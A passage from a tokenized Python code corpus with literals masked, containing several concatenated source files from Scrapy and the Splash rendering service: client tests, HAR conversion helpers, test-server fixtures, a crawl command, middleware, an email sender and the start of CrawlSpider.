assertEqual ( o [ <NUM_LIT:0> ] , [ ts , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> self . assertEqual ( o [ <NUM_LIT:1> ] , [ ts + <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:4> ] ) <EOL> j2 = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> samples = [ ] <EOL> ts = millitime ( ) <EOL> count = int ( j2 . samples . 
batch_size * ( random ( ) + randint ( <NUM_LIT:1> , <NUM_LIT:5> ) ) ) <EOL> for _ in xrange ( count ) : <EOL> ts += randint ( <NUM_LIT:1> , <NUM_LIT:2> ** <NUM_LIT:16> ) <EOL> row = [ ts ] + list ( randint ( <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:16> ) for _ in xrange ( randint ( <NUM_LIT:0> , <NUM_LIT:100> ) ) ) <EOL> samples . append ( row ) <EOL> j2 . samples . write ( row ) <EOL> j2 . samples . flush ( ) <EOL> o = list ( j2 . samples . list ( ) ) <EOL> self . assertEqual ( len ( o ) , count ) <EOL> for r1 , r2 in zip ( samples , o ) : <EOL> self . assertEqual ( r1 , r2 ) <EOL> def test_jobsummary ( self ) : <EOL> js = self . project . jobsummary ( ) <EOL> self . assertEqual ( js . get ( '<STR_LIT>' ) , int ( self . project . projectid ) , js ) <EOL> self . assertEqual ( js . get ( '<STR_LIT>' ) , True , js ) <EOL> self . assertTrue ( '<STR_LIT>' in js , js ) <EOL> self . assertTrue ( '<STR_LIT>' in js , js ) <EOL> def test_bulkdata ( self ) : <EOL> j = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> for i in xrange ( <NUM_LIT:20> ) : <EOL> j . logs . info ( "<STR_LIT>" % i ) <EOL> j . items . write ( dict ( field1 = "<STR_LIT>" % i ) ) <EOL> j . requests . add ( "<STR_LIT>" % i , <EOL> <NUM_LIT:200> , '<STR_LIT:GET>' , <NUM_LIT:10> , None , <NUM_LIT:10> , <NUM_LIT> ) <EOL> for resourcename in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> resource = getattr ( j , resourcename ) <EOL> resource . flush ( ) <EOL> with failing_downloader ( resource ) : <EOL> downloaded = list ( resource . iter_values ( ) ) <EOL> self . assertEqual ( len ( downloaded ) , <NUM_LIT:20> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import base64 <EOL> from PyQt5 . QtCore import Qt , QVariant , QUrlQuery <EOL> from PyQt5 . QtNetwork import QNetworkRequest <EOL> import six <EOL> from splash . qtutils import ( <EOL> REQUEST_ERRORS_SHORT , <EOL> OPERATION_NAMES , <EOL> qt_header_items <EOL> ) <EOL> def headers2har ( request_or_reply ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> { <EOL> "<STR_LIT:name>" : bytes ( name ) . decode ( '<STR_LIT>' ) , <EOL> "<STR_LIT:value>" : bytes ( value ) . decode ( '<STR_LIT>' ) , <EOL> } <EOL> for name , value in qt_header_items ( request_or_reply ) <EOL> ] <EOL> def headers_size ( request_or_reply ) : <EOL> """<STR_LIT>""" <EOL> size = <NUM_LIT:0> <EOL> for name , value in qt_header_items ( request_or_reply ) : <EOL> size += name . size ( ) + <NUM_LIT:2> + value . size ( ) + <NUM_LIT:2> <EOL> return size <EOL> def request_cookies2har ( request ) : <EOL> """<STR_LIT>""" <EOL> cookies = request . header ( QNetworkRequest . CookieHeader ) <EOL> return cookies2har ( cookies ) <EOL> def reply_cookies2har ( reply ) : <EOL> """<STR_LIT>""" <EOL> cookies = reply . header ( QNetworkRequest . SetCookieHeader ) <EOL> return cookies2har ( cookies ) <EOL> def cookies2har ( cookies ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( cookies , QVariant ) : <EOL> cookies = cookies . toPyObject ( ) <EOL> return [ cookie2har ( cookie ) for cookie in ( cookies or [ ] ) ] <EOL> def cookie2har ( cookie ) : <EOL> """<STR_LIT>""" <EOL> cookie = { <EOL> "<STR_LIT:name>" : bytes ( cookie . name ( ) ) . decode ( '<STR_LIT:utf8>' , '<STR_LIT:replace>' ) , <EOL> "<STR_LIT:value>" : bytes ( cookie . value ( ) ) . decode ( '<STR_LIT:utf8>' , '<STR_LIT:replace>' ) , <EOL> "<STR_LIT:path>" : six . text_type ( cookie . path ( ) ) , <EOL> "<STR_LIT>" : six . text_type ( cookie . domain ( ) ) , <EOL> "<STR_LIT>" : six . text_type ( cookie . expirationDate ( ) . toString ( Qt . ISODate ) ) , <EOL> "<STR_LIT>" : cookie . 
isHttpOnly ( ) , <EOL> "<STR_LIT>" : cookie . isSecure ( ) , <EOL> } <EOL> if not cookie [ "<STR_LIT>" ] : <EOL> del cookie [ "<STR_LIT>" ] <EOL> return cookie <EOL> def querystring2har ( url ) : <EOL> return [ <EOL> { "<STR_LIT:name>" : six . text_type ( name ) , "<STR_LIT:value>" : six . text_type ( value ) } <EOL> for name , value in QUrlQuery ( url ) . queryItems ( ) <EOL> ] <EOL> def reply2har ( reply , include_content = False , binary_content = False ) : <EOL> """<STR_LIT>""" <EOL> res = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : reply_cookies2har ( reply ) , <EOL> "<STR_LIT>" : headers2har ( reply ) , <EOL> "<STR_LIT:content>" : { <EOL> "<STR_LIT:size>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : headers_size ( reply ) , <EOL> "<STR_LIT>" : not reply . error ( ) , <EOL> "<STR_LIT:url>" : reply . url ( ) . toString ( ) <EOL> } <EOL> content_type = reply . header ( QNetworkRequest . ContentTypeHeader ) <EOL> if content_type is not None : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] = six . text_type ( content_type ) <EOL> content_length = reply . header ( QNetworkRequest . ContentLengthHeader ) <EOL> if content_length is not None : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:size>" ] = content_length <EOL> status = reply . attribute ( QNetworkRequest . HttpStatusCodeAttribute ) <EOL> if status is not None : <EOL> res [ "<STR_LIT:status>" ] = int ( status ) <EOL> else : <EOL> res [ "<STR_LIT:status>" ] = <NUM_LIT:0> <EOL> status_text = reply . attribute ( QNetworkRequest . HttpReasonPhraseAttribute ) <EOL> if status_text is not None : <EOL> try : <EOL> res [ "<STR_LIT>" ] = bytes ( status_text , '<STR_LIT>' ) . decode ( '<STR_LIT>' ) <EOL> except TypeError : <EOL> res [ "<STR_LIT>" ] = bytes ( status_text ) . decode ( '<STR_LIT>' ) <EOL> else : <EOL> res [ "<STR_LIT>" ] = REQUEST_ERRORS_SHORT . get ( reply . error ( ) , "<STR_LIT:?>" ) <EOL> redirect_url = reply . attribute ( QNetworkRequest . 
RedirectionTargetAttribute ) <EOL> if redirect_url is not None : <EOL> res [ "<STR_LIT>" ] = six . text_type ( redirect_url . toString ( ) ) <EOL> else : <EOL> res [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> if include_content : <EOL> data = bytes ( reply . readAll ( ) ) <EOL> if binary_content : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:text>" ] = data <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:size>" ] = len ( data ) <EOL> else : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:text>" ] = base64 . b64encode ( data ) <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:size>" ] = len ( data ) <EOL> return res <EOL> def request2har ( request , operation , outgoing_data = None ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> "<STR_LIT>" : OPERATION_NAMES . get ( operation , '<STR_LIT:?>' ) , <EOL> "<STR_LIT:url>" : six . text_type ( request . url ( ) . toString ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : request_cookies2har ( request ) , <EOL> "<STR_LIT>" : querystring2har ( request . url ( ) ) , <EOL> "<STR_LIT>" : headers2har ( request ) , <EOL> "<STR_LIT>" : headers_size ( request ) , <EOL> "<STR_LIT>" : outgoing_data . size ( ) if outgoing_data is not None else - <NUM_LIT:1> , <EOL> } </s>
<s> import os <EOL> class SentryLogger ( object ) : <EOL> def __init__ ( self ) : <EOL> try : <EOL> import raven <EOL> self . enabled = True <EOL> dsn = os . environ [ '<STR_LIT>' ] <EOL> if dsn . startswith ( '<STR_LIT>' ) : <EOL> dsn = dsn . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . client = raven . Client ( dsn ) <EOL> except ( ImportError , KeyError ) : <EOL> self . enabled = False <EOL> def capture ( self , failure ) : <EOL> if self . enabled : <EOL> self . client . captureException ( ( failure . type , failure . value , failure . getTracebackObject ( ) ) ) <EOL> capture = SentryLogger ( ) . capture </s>
<s> import random <EOL> import string <EOL> import sys , os , time , tempfile , shutil , socket , fcntl , signal <EOL> from subprocess import Popen , PIPE <EOL> try : <EOL> socket . getaddrinfo ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NON_EXISTING_RESOLVABLE = True <EOL> except socket . gaierror : <EOL> NON_EXISTING_RESOLVABLE = False <EOL> def get_testenv ( ) : <EOL> env = os . environ . copy ( ) <EOL> env [ '<STR_LIT>' ] = os . getcwd ( ) <EOL> return env <EOL> def get_ephemeral_port ( ) : <EOL> s = socket . socket ( ) <EOL> s . bind ( ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> return s . getsockname ( ) [ <NUM_LIT:1> ] <EOL> def _non_block_read ( output ) : <EOL> fd = output . fileno ( ) <EOL> fl = fcntl . fcntl ( fd , fcntl . F_GETFL ) <EOL> fcntl . fcntl ( fd , fcntl . F_SETFL , fl | os . O_NONBLOCK ) <EOL> try : <EOL> return output . read ( ) <EOL> except Exception : <EOL> return "<STR_LIT>" <EOL> def _wait_for_port ( portnum , delay = <NUM_LIT:0.1> , attempts = <NUM_LIT:100> ) : <EOL> while attempts > <NUM_LIT:0> : <EOL> s = socket . socket ( ) <EOL> if s . connect_ex ( ( '<STR_LIT:127.0.0.1>' , portnum ) ) == <NUM_LIT:0> : <EOL> s . close ( ) <EOL> return <EOL> time . sleep ( delay ) <EOL> attempts -= <NUM_LIT:1> <EOL> raise RuntimeError ( "<STR_LIT>" % portnum ) <EOL> class SplashServer ( object ) : <EOL> def __init__ ( self , logfile = None , proxy_profiles_path = None , <EOL> js_profiles_path = None , filters_path = None , portnum = None , <EOL> extra_args = None , verbosity = <NUM_LIT:3> ) : <EOL> self . logfile = logfile <EOL> self . proxy_profiles_path = proxy_profiles_path <EOL> self . js_profiles_path = js_profiles_path <EOL> self . filters_path = filters_path <EOL> self . verbosity = verbosity <EOL> self . portnum = portnum if portnum is not None else get_ephemeral_port ( ) <EOL> self . tempdir = tempfile . mkdtemp ( ) <EOL> self . extra_args = extra_args or [ ] <EOL> def __enter__ ( self ) : <EOL> args = [ sys . 
executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> args += [ '<STR_LIT>' , str ( self . portnum ) ] <EOL> args += [ '<STR_LIT>' , str ( self . verbosity ) ] <EOL> if self . logfile : <EOL> args += [ '<STR_LIT>' , self . logfile ] <EOL> if self . proxy_profiles_path : <EOL> args += [ '<STR_LIT>' , self . proxy_profiles_path ] <EOL> if self . js_profiles_path : <EOL> args += [ '<STR_LIT>' , self . js_profiles_path ] <EOL> if self . filters_path : <EOL> args += [ '<STR_LIT>' , self . filters_path ] <EOL> args . extend ( self . extra_args ) <EOL> self . proc = Popen ( args , env = get_testenv ( ) ) <EOL> self . proc . poll ( ) <EOL> if self . proc . returncode is not None : <EOL> msg = ( "<STR_LIT>" % <EOL> self . proc . returncode ) <EOL> raise RuntimeError ( msg ) <EOL> _wait_for_port ( self . portnum ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> if self . proc is not None : <EOL> self . proc . send_signal ( signal . SIGINT ) <EOL> self . proc . wait ( ) <EOL> self . proc = None <EOL> shutil . rmtree ( self . tempdir ) <EOL> def url ( self , path ) : <EOL> return "<STR_LIT>" % ( self . portnum , path . lstrip ( '<STR_LIT:/>' ) ) <EOL> class MockServer ( object ) : <EOL> def __init__ ( self , http_port = None , https_port = None , proxy_port = None , auth_proxy_port = None , auth_proxy_user = None ) : <EOL> self . http_port = http_port if http_port is not None else get_ephemeral_port ( ) <EOL> self . https_port = https_port if https_port is not None else get_ephemeral_port ( ) <EOL> self . proxy_port = proxy_port if proxy_port is not None else get_ephemeral_port ( ) <EOL> self . auth_proxy_port = auth_proxy_port if auth_proxy_port is not None else get_ephemeral_port ( ) <EOL> self . auth_proxy_user = auth_proxy_user <EOL> def __enter__ ( self ) : <EOL> self . proc = Popen ( [ <EOL> sys . executable , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , str ( self . 
http_port ) , <EOL> '<STR_LIT>' , str ( self . https_port ) , <EOL> '<STR_LIT>' , str ( self . proxy_port ) , <EOL> "<STR_LIT>" , str ( self . auth_proxy_port ) , <EOL> "<STR_LIT>" , str ( self . auth_proxy_user ) <EOL> ] , <EOL> env = get_testenv ( ) <EOL> ) <EOL> for port in ( self . http_port , self . https_port , self . proxy_port , self . auth_proxy_port ) : <EOL> _wait_for_port ( port ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . proc . kill ( ) <EOL> self . proc . wait ( ) <EOL> def url ( self , path , gzip = True , host = '<STR_LIT:localhost>' ) : <EOL> gzip_path = '<STR_LIT>' if not gzip else '<STR_LIT>' <EOL> return "<STR_LIT>" % ( <EOL> host , self . http_port , gzip_path , path . lstrip ( '<STR_LIT:/>' ) <EOL> ) <EOL> def https_url ( self , path ) : <EOL> return "<STR_LIT>" % ( self . https_port , path . lstrip ( '<STR_LIT:/>' ) ) <EOL> class TestServers ( object ) : <EOL> def __init__ ( self , logfile = None ) : <EOL> self . logfile = logfile <EOL> self . tmp_folder = tempfile . mkdtemp ( "<STR_LIT>" ) <EOL> self . proxy_profiles_path = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . js_profiles_path = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . filters_path = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . lua_modules = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . lua_sandbox_allowed_modules = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . mock_http_port = get_ephemeral_port ( ) <EOL> self . mock_https_port = get_ephemeral_port ( ) <EOL> self . mock_proxy_port = get_ephemeral_port ( ) <EOL> self . mock_auth_proxy_port = get_ephemeral_port ( ) <EOL> self . mock_auth_proxy_user = "<STR_LIT>" . join ( random . choice ( string . ascii_letters ) for _ in range ( <NUM_LIT:20> ) ) <EOL> print ( "<STR_LIT>" % ( <EOL> self . mock_http_port , self . mock_https_port , self . mock_proxy_port , self . mock_auth_proxy_port ) ) <EOL> self . 
_fix_testproxy_port ( ) <EOL> def _copy_test_folder ( self , src , dst = None ) : <EOL> src_path = test_path ( src ) <EOL> dst_path = os . path . join ( self . tmp_folder , dst or src ) <EOL> shutil . copytree ( src_path , dst_path ) <EOL> return dst_path <EOL> def _fix_testproxy_port ( self ) : <EOL> filename = os . path . join ( self . proxy_profiles_path , u'<STR_LIT>' ) <EOL> with open ( filename , '<STR_LIT:rb>' ) as f : <EOL> data = f . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> data = data . replace ( u'<STR_LIT>' , str ( self . mock_proxy_port ) ) <EOL> with open ( filename , '<STR_LIT:wb>' ) as f : <EOL> f . write ( data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def __enter__ ( self ) : <EOL> self . mockserver = MockServer ( <EOL> self . mock_http_port , <EOL> self . mock_https_port , <EOL> self . mock_proxy_port , <EOL> self . mock_auth_proxy_port , <EOL> self . mock_auth_proxy_user <EOL> ) <EOL> self . mockserver . __enter__ ( ) <EOL> self . splashserver = SplashServer ( <EOL> logfile = self . logfile , <EOL> proxy_profiles_path = self . proxy_profiles_path , <EOL> js_profiles_path = self . js_profiles_path , <EOL> filters_path = self . filters_path , <EOL> extra_args = [ <EOL> '<STR_LIT>' , '<STR_LIT>' % self . lua_modules . rstrip ( '<STR_LIT:/>' ) , <EOL> '<STR_LIT>' , '<STR_LIT:;>' . join ( self . lua_sandbox_allowed_modules ) , <EOL> ] <EOL> ) <EOL> self . splashserver . __enter__ ( ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . splashserver . __exit__ ( None , None , None ) <EOL> self . mockserver . __exit__ ( None , None , None ) <EOL> shutil . rmtree ( self . tmp_folder ) <EOL> def test_path ( * args ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , * args ) </s>
<s> import os <EOL> from scrapy . commands import ScrapyCommand <EOL> from scrapy . utils . conf import arglist_to_dict <EOL> from scrapy . utils . python import without_none_values <EOL> from scrapy . exceptions import UsageError <EOL> class Command ( ScrapyCommand ) : <EOL> requires_project = True <EOL> def syntax ( self ) : <EOL> return "<STR_LIT>" <EOL> def short_desc ( self ) : <EOL> return "<STR_LIT>" <EOL> def add_options ( self , parser ) : <EOL> ScrapyCommand . add_options ( self , parser ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , default = [ ] , metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> def process_options ( self , args , opts ) : <EOL> ScrapyCommand . process_options ( self , args , opts ) <EOL> try : <EOL> opts . spargs = arglist_to_dict ( opts . spargs ) <EOL> except ValueError : <EOL> raise UsageError ( "<STR_LIT>" , print_help = False ) <EOL> if opts . output : <EOL> if opts . output == '<STR_LIT:->' : <EOL> self . settings . set ( '<STR_LIT>' , '<STR_LIT>' , priority = '<STR_LIT>' ) <EOL> else : <EOL> self . settings . set ( '<STR_LIT>' , opts . output , priority = '<STR_LIT>' ) <EOL> feed_exporters = without_none_values ( <EOL> self . settings . getwithbase ( '<STR_LIT>' ) ) <EOL> valid_output_formats = feed_exporters . keys ( ) <EOL> if not opts . output_format : <EOL> opts . output_format = os . path . splitext ( opts . output ) [ <NUM_LIT:1> ] . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> if opts . output_format not in valid_output_formats : <EOL> raise UsageError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( opts . output_format , <EOL> tuple ( valid_output_formats ) ) ) <EOL> self . settings . set ( '<STR_LIT>' , opts . 
output_format , priority = '<STR_LIT>' ) <EOL> def run ( self , args , opts ) : <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> raise UsageError ( ) <EOL> elif len ( args ) > <NUM_LIT:1> : <EOL> raise UsageError ( "<STR_LIT>" ) <EOL> spname = args [ <NUM_LIT:0> ] <EOL> self . crawler_process . crawl ( spname , ** opts . spargs ) <EOL> self . crawler_process . start ( ) </s>
<s> import warnings <EOL> from scrapy . exceptions import ScrapyDeprecationWarning <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ScrapyDeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> from scrapy . downloadermiddlewares . redirect import * </s>
<s> import warnings <EOL> from scrapy . exceptions import ScrapyDeprecationWarning <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ScrapyDeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> from scrapy . spiders import * </s>
<s> from __future__ import absolute_import <EOL> import re <EOL> import logging <EOL> import six <EOL> from w3lib import html <EOL> from scrapy . exceptions import NotConfigured <EOL> from scrapy . http import HtmlResponse <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AjaxCrawlMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , settings ) : <EOL> if not settings . getbool ( '<STR_LIT>' ) : <EOL> raise NotConfigured <EOL> self . lookup_bytes = settings . getint ( '<STR_LIT>' , <NUM_LIT> ) <EOL> @ classmethod <EOL> def from_crawler ( cls , crawler ) : <EOL> return cls ( crawler . settings ) <EOL> def process_response ( self , request , response , spider ) : <EOL> if not isinstance ( response , HtmlResponse ) or response . status != <NUM_LIT:200> : <EOL> return response <EOL> if request . method != '<STR_LIT:GET>' : <EOL> return response <EOL> if '<STR_LIT>' in request . meta : <EOL> return response <EOL> if not self . _has_ajax_crawlable_variant ( response ) : <EOL> return response <EOL> ajax_crawl_request = request . replace ( url = request . url + '<STR_LIT>' ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : ajax_crawl_request , '<STR_LIT>' : request } , <EOL> extra = { '<STR_LIT>' : spider } ) <EOL> ajax_crawl_request . meta [ '<STR_LIT>' ] = True <EOL> return ajax_crawl_request <EOL> def _has_ajax_crawlable_variant ( self , response ) : <EOL> """<STR_LIT>""" <EOL> body = response . text [ : self . lookup_bytes ] <EOL> return _has_ajaxcrawlable_meta ( body ) <EOL> _ajax_crawlable_re = re . compile ( six . u ( r'<STR_LIT>' ) ) <EOL> def _has_ajaxcrawlable_meta ( text ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in text : <EOL> return False <EOL> if '<STR_LIT:content>' not in text : <EOL> return False <EOL> text = html . remove_tags_with_content ( text , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> text = html . replace_entities ( text ) <EOL> text = html . remove_comments ( text ) <EOL> return _ajax_crawlable_re . 
search ( text ) is not None </s>
<s> """<STR_LIT>""" <EOL> from scrapy import signals <EOL> from scrapy . mail import MailSender <EOL> from scrapy . exceptions import NotConfigured <EOL> class StatsMailer ( object ) : <EOL> def __init__ ( self , stats , recipients , mail ) : <EOL> self . stats = stats <EOL> self . recipients = recipients <EOL> self . mail = mail <EOL> @ classmethod <EOL> def from_crawler ( cls , crawler ) : <EOL> recipients = crawler . settings . getlist ( "<STR_LIT>" ) <EOL> if not recipients : <EOL> raise NotConfigured <EOL> mail = MailSender . from_settings ( crawler . settings ) <EOL> o = cls ( crawler . stats , recipients , mail ) <EOL> crawler . signals . connect ( o . spider_closed , signal = signals . spider_closed ) <EOL> return o <EOL> def spider_closed ( self , spider ) : <EOL> spider_stats = self . stats . get_stats ( spider ) <EOL> body = "<STR_LIT>" <EOL> body += "<STR_LIT:\n>" . join ( "<STR_LIT>" % i for i in self . stats . get_stats ( ) . items ( ) ) <EOL> body += "<STR_LIT>" % spider . name <EOL> body += "<STR_LIT:\n>" . join ( "<STR_LIT>" % i for i in spider_stats . items ( ) ) <EOL> return self . mail . send ( self . recipients , "<STR_LIT>" % spider . name , body ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from six . moves import cStringIO as StringIO <EOL> import six <EOL> from email . utils import COMMASPACE , formatdate <EOL> from six . moves . email_mime_multipart import MIMEMultipart <EOL> from six . moves . email_mime_text import MIMEText <EOL> from six . moves . email_mime_base import MIMEBase <EOL> if six . PY2 : <EOL> from email . MIMENonMultipart import MIMENonMultipart <EOL> from email import Encoders <EOL> else : <EOL> from email . mime . nonmultipart import MIMENonMultipart <EOL> from email import encoders as Encoders <EOL> from twisted . internet import defer , reactor , ssl <EOL> logger = logging . getLogger ( __name__ ) <EOL> class MailSender ( object ) : <EOL> def __init__ ( self , smtphost = '<STR_LIT:localhost>' , mailfrom = '<STR_LIT>' , <EOL> smtpuser = None , smtppass = None , smtpport = <NUM_LIT> , smtptls = False , smtpssl = False , debug = False ) : <EOL> self . smtphost = smtphost <EOL> self . smtpport = smtpport <EOL> self . smtpuser = smtpuser <EOL> self . smtppass = smtppass <EOL> self . smtptls = smtptls <EOL> self . smtpssl = smtpssl <EOL> self . mailfrom = mailfrom <EOL> self . debug = debug <EOL> @ classmethod <EOL> def from_settings ( cls , settings ) : <EOL> return cls ( settings [ '<STR_LIT>' ] , settings [ '<STR_LIT>' ] , settings [ '<STR_LIT>' ] , <EOL> settings [ '<STR_LIT>' ] , settings . getint ( '<STR_LIT>' ) , <EOL> settings . getbool ( '<STR_LIT>' ) , settings . getbool ( '<STR_LIT>' ) ) <EOL> def send ( self , to , subject , body , cc = None , attachs = ( ) , mimetype = '<STR_LIT>' , charset = None , _callback = None ) : <EOL> if attachs : <EOL> msg = MIMEMultipart ( ) <EOL> else : <EOL> msg = MIMENonMultipart ( * mimetype . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) ) <EOL> msg [ '<STR_LIT>' ] = self . mailfrom <EOL> msg [ '<STR_LIT>' ] = COMMASPACE . 
join ( to ) <EOL> msg [ '<STR_LIT>' ] = formatdate ( localtime = True ) <EOL> msg [ '<STR_LIT>' ] = subject <EOL> rcpts = to [ : ] <EOL> if cc : <EOL> rcpts . extend ( cc ) <EOL> msg [ '<STR_LIT>' ] = COMMASPACE . join ( cc ) <EOL> if charset : <EOL> msg . set_charset ( charset ) <EOL> if attachs : <EOL> msg . attach ( MIMEText ( body , '<STR_LIT>' , charset or '<STR_LIT>' ) ) <EOL> for attach_name , mimetype , f in attachs : <EOL> part = MIMEBase ( * mimetype . split ( '<STR_LIT:/>' ) ) <EOL> part . set_payload ( f . read ( ) ) <EOL> Encoders . encode_base64 ( part ) <EOL> part . add_header ( '<STR_LIT>' , '<STR_LIT>' % attach_name ) <EOL> msg . attach ( part ) <EOL> else : <EOL> msg . set_payload ( body ) <EOL> if _callback : <EOL> _callback ( to = to , subject = subject , body = body , cc = cc , attach = attachs , msg = msg ) <EOL> if self . debug : <EOL> logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : to , '<STR_LIT>' : cc , '<STR_LIT>' : subject , <EOL> '<STR_LIT>' : len ( attachs ) } ) <EOL> return <EOL> dfd = self . _sendmail ( rcpts , msg . as_string ( ) ) <EOL> dfd . addCallbacks ( self . _sent_ok , self . _sent_failed , <EOL> callbackArgs = [ to , cc , subject , len ( attachs ) ] , <EOL> errbackArgs = [ to , cc , subject , len ( attachs ) ] ) <EOL> reactor . addSystemEventTrigger ( '<STR_LIT>' , '<STR_LIT>' , lambda : dfd ) <EOL> return dfd <EOL> def _sent_ok ( self , result , to , cc , subject , nattachs ) : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : to , '<STR_LIT>' : cc , '<STR_LIT>' : subject , <EOL> '<STR_LIT>' : nattachs } ) <EOL> def _sent_failed ( self , failure , to , cc , subject , nattachs ) : <EOL> errstr = str ( failure . value ) <EOL> logger . 
error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : to , '<STR_LIT>' : cc , '<STR_LIT>' : subject , <EOL> '<STR_LIT>' : nattachs , '<STR_LIT>' : errstr } ) <EOL> def _sendmail ( self , to_addrs , msg ) : <EOL> from twisted . mail . smtp import ESMTPSenderFactory <EOL> msg = StringIO ( msg ) <EOL> d = defer . Deferred ( ) <EOL> factory = ESMTPSenderFactory ( self . smtpuser , self . smtppass , self . mailfrom , to_addrs , msg , d , heloFallback = True , requireAuthentication = False , requireTransportSecurity = self . smtptls ) <EOL> factory . noisy = False <EOL> if self . smtpssl : <EOL> reactor . connectSSL ( self . smtphost , self . smtpport , factory , ssl . ClientContextFactory ( ) ) <EOL> else : <EOL> reactor . connectTCP ( self . smtphost , self . smtpport , factory ) <EOL> return d </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import six <EOL> from scrapy . http import Request , HtmlResponse <EOL> from scrapy . utils . spider import iterate_spider_output <EOL> from scrapy . spiders import Spider <EOL> def identity ( x ) : <EOL> return x <EOL> class Rule ( object ) : <EOL> def __init__ ( self , link_extractor , callback = None , cb_kwargs = None , follow = None , process_links = None , process_request = identity ) : <EOL> self . link_extractor = link_extractor <EOL> self . callback = callback <EOL> self . cb_kwargs = cb_kwargs or { } <EOL> self . process_links = process_links <EOL> self . process_request = process_request <EOL> if follow is None : <EOL> self . follow = False if callback else True <EOL> else : <EOL> self . follow = follow <EOL> class CrawlSpider ( Spider ) : <EOL> rules = ( ) <EOL> def __init__ ( self , * a , ** kw ) : <EOL> super ( CrawlSpider , self ) . __init__ ( * a , ** kw ) <EOL> self . _compile_rules ( ) <EOL> def parse ( self , response ) : <EOL> return self . _parse_response ( response , self . parse_start_url , cb_kwargs = { } , follow = True ) <EOL> def parse_start_url ( self , response ) : <EOL> return [ ] <EOL> def process_results ( self , response , results ) : <EOL> return results <EOL> def _requests_to_follow ( self , response ) : <EOL> if not isinstance ( response , HtmlResponse ) : <EOL> return <EOL> seen = set ( ) <EOL> for n , rule in enumerate ( self . _rules ) : <EOL> links = [ lnk for lnk in rule . link_extractor . extract_links ( response ) <EOL> if lnk not in seen ] <EOL> if links and rule . process_links : <EOL> links = rule . process_links ( links ) <EOL> for link in links : <EOL> seen . add ( link ) <EOL> r = Request ( url = link . url , callback = self . _response_downloaded ) <EOL> r . meta . update ( rule = n , link_text = link . text ) <EOL> yield rule . process_request ( r ) <EOL> def _response_downloaded ( self , response ) : <EOL> rule = self . _rules [ response . 
